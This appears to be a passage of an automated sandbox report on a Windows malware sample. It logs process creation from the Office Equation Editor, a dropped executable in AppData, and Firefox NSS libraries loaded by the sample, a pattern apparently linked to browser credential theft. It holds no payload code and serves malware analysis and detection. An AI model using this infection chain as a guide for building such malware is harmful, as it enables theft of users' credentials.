Source: unknown | Process created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exe
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Process created: C:\Users\user\AppData\Roaming\hjdegydbhk.exe C:\Users\user\AppData\Roaming\hjdegydbhk.exe
Source: C:\Users\user\AppData\Roaming\hjdegydbhk.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
            Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2124621386.000000001F9C0000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128987010.000000001F618000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: hjdegydbhk.exe, 00000005.00000003.2125456256.000000001F9BC000.00000004.00000001.sdmp, mozglue.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: hjdegydbhk.exe, 00000005.00000003.2129972619.000000001F71C000.00000004.00000001.sdmp, nss3.dll.5.dr
            Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
            Source: Binary string: ucrtbase.pdb source: hjdegydbhk.exe, 00000005.00000003.2127283752.000000001F028000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
            Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: hjdegydbhk.exe, 00000005.00000003.2125266844.000000001EFF4000.00000004.00000001.sdmp, freebl3.dll.5.dr
            Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128318091.000000001F5AC000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128607566.000000001F5D8000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128987010.000000001F618000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2126627030.000000001F9E0000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128318091.000000001F5AC000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2123986478.000000001F9C0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
            Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: hjdegydbhk.exe, 00000005.00000003.2128607566.000000001F5D8000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
            Source: Binary string: vcruntime140.i386.pdbGCTL source: hjdegydbhk.exe, 00000005.00000003.2131170016.000000001F9A4000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
            Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: hjdegydbhk.exe, 00000005.00000003.2125456256.000000001F9BC000.00000004.00000001.sdmp, mozglue.dll.5.dr
            Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb